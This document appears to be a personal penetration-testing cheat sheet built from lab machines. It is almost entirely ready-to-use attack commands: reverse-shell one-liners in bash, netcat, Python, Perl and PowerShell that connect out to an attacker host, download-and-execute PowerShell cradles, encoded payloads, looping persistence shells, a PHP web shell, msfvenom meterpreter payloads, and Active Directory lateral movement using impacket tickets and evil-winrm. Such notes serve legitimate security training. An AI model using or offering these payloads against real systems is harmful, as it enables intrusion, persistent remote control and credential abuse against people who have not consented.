Reverse Shell
Linux
#Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'
#netcat
nc <ip> <port> -e /bin/bash
nc <ip> <port> -e cmd.exe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 443 >/tmp/f
#php
#(with proc_open & proc_close - shell.phar)
<?php
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("file", "/tmp/error-output.txt", "a")
);
$cwd = "/tmp";
$env = array("some_option" => "aeiou");
$process = proc_open("sh", $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], "nc 127.0.0.1 9001");
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
#python injection input
__import__('os').system('whoami')
#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
Windows
nc64.exe
nc64.exe -e cmd.exe <IP> 443
#Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File shell.ps1
#Execute file remotely
IEX (New-Object System.Net.WebClient).DownloaString('http://<attacker ip>/shell.ps1')
# Invoke-PowershellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1
# 1. setup python http server
# 2. execute
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1")
#or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1
# encode payload
Cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le |base64 -w 0
powershell -enc <encode payload>
# Execute command without crashing the previous shell
# 1. pwn.ps1
Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe
# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri <attacker ip>/pwn.ps1 -usebasicparsing)"
# note: you could change the payload in the pwn.ps1 if your payload doesn't work.
Shell Stabilization (Linux)
When?
Note:
[ctrl + c] only work if machine has bash as the default shell
use "clear" instead.
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='clear ; ls -lsaht --color=auto'
Keyboart Shortcut: [Ctrl + Z] (Backgroud Process.)
stty raw -echo ; fg ; reset
stty columns 200 rows 200
Persistence Reverse Shell
Important to run persistence shell before execute anything.
Linux
while :; do setsid bash -i &>/dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done &>/dev/null &
nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &
Windows
need to upload nc.exe
start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
Web Shell
PHP
cmd --> shell.php
<?php
echo system($_REQUEST['cmd']);
?>
$URL/shell.php?cmd=id
note: the simple way is using burp suite repeater to do a command.
change GET request to POST request to get a better input experience.
IIS
ASPX run Shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=443 -f aspx
or
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.1 LPORT=443 -f aspx
Dig deeper
https://github.com/tennc/webshell
Windows NT Authority shell from Administrator
psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
Shell to another user in Active Directory
note: powershell
Convert credentials
$pw = ConvertTo-SecureString "<password>" -AsPlainText -Force
$creds = New-Object System.Mangement.Automation.PSCredential "<username>", $pw
Command
Invoke-Command -ComputerName 127.0.0.1 -cred $creds -SCriptBlock { whoami }
after login, run powerview.
Shell with silver ticket
If the domain user has constrained delegation privileges you can use the -impersonate flag to request a ticket on behalf of another user
for example:
# example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator
Request ticket
# username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
# NTLM Hash
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <ntlm hash>:<ntlm hash>
Save ticket to env
export KRB5CCNAME=Administrator.ccache
Login with ticket
impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Login using Impacket (need local admin creds)
need creds login, try the next command below if you failed on the one command.
# test with crackmapexec smb
impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP
# wmi port
impacket-wmiexec <domain>/<username>@$IP
# test with crackmapexec winrm (WinRM (port
5985)
evil-winrm -i $IP -u <username> -p <password>
